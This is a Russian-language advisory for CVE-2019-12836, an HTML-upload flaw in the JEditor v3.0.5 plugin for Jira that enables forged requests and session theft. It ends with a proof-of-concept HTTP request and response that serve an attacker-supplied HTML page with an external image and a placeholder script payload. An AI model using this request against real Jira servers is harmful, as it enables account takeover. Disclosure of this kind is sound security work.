
CVE-2019-12836

JEditor v3.0.5 — WYSIWYG-редактор для JIRA
Простой, но мощный редактор форматированного текста для Jira. Импорт HTML-писем, вставка форматированного содержимого, создание шаблонов и предварительное заполнение полей.
Bobronix
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12836
JEditor — WYSIWYG-редактор для Jira — v3.0.5
JEditor v3.0.5
Редактор Bobronix JEditor до версии v3.0.6 для Jira позволяет злоумышленнику добавить URL/ссылку (на существующую задачу), которая может вызвать подделку запроса к домену, отличному от исходного. Это, в свою очередь, может привести к поддельному запросу, который может быть выполнен в контексте аутентифицированного пользователя, что ведёт к краже токенов сессии и захвату учётной записи.
JEditor v3.0.5 позволяет загружать файлы различных расширений, одним из которых является '.HTML'. JEditor используется JIRA для функциональности загрузки файлов. Используя эту функцию, злоумышленник может загрузить вредоносное содержимое.
После загрузки вредоносного содержимого может быть сделан последующий запрос на его получение, который позволяет отображать и обрабатывать это содержимое в контексте браузера любого аутентифицированного пользователя. Это может позволить злоумышленнику подделать вредоносный запрос от имени любого аутентифицированного пользователя.
Межсайтовая подделка запроса (CSRF)
Ошибка исправлена в JEditor v3.0.6
https://jeditor.zendesk.com/hc/en-us/articles/360029430751-JEditor-3-0-6-release-notes
Позволяет выполнить поддельный запрос, что создаёт возможность для клиентской атаки
Требуется взаимодействие аутентифицированного пользователя со встроенной ссылкой/URL
Автор: Victor Hanna (Exploit Security)
GET /plugins/servlet/jeditor_file_provider?imgId=ckupload201906162566696393384747423&fileName=C%3A%5Ctemp%5CPOC.html HTTP/1.1
Host: <vulnerable host>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0)
Accept: text/html,application/xhtml_xml,application/xml;q=0.9,*/*;q=0.8
Accept-Langauge: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://<vulnerable host>/secure/Dashboard.jspa
DNT: 1
Connection: close
Cookie: atlassian.xsrf.token=BNXD-VY4I-RCJA-J3YA_34d13dd7fae0f32023fc89838ldc0b6c35991382_lin; JSESSION=42E9F5581BAE499E3E9E45B9D44E6F3C
Upgrade-Insecure-Requests: 1
HTTP/1.1 200
Server: nginx/1.10.2
Date: Sun, 16 Jun 2019 03:06:10 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
X-AREQUESTID: 786x226666x1
X-ASESSIONID: pn6xpm
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-ASEN: SEN-2322842
X-Seraph-LoginReason: OK
X-AUSERNAME:
Content-Disposition: inline; filename="C:\temp\POC.html"
Vary: User-Agent
Content-Length: 236
<html>
<head>
<img src="http://{insert external image location here}">
<script>{JS Payload of any description}</script>
</head>
<body>
<h1>
Welcome to the Jungle !
</h1>
</body>
</html>
Victor Hanna из Exploit Security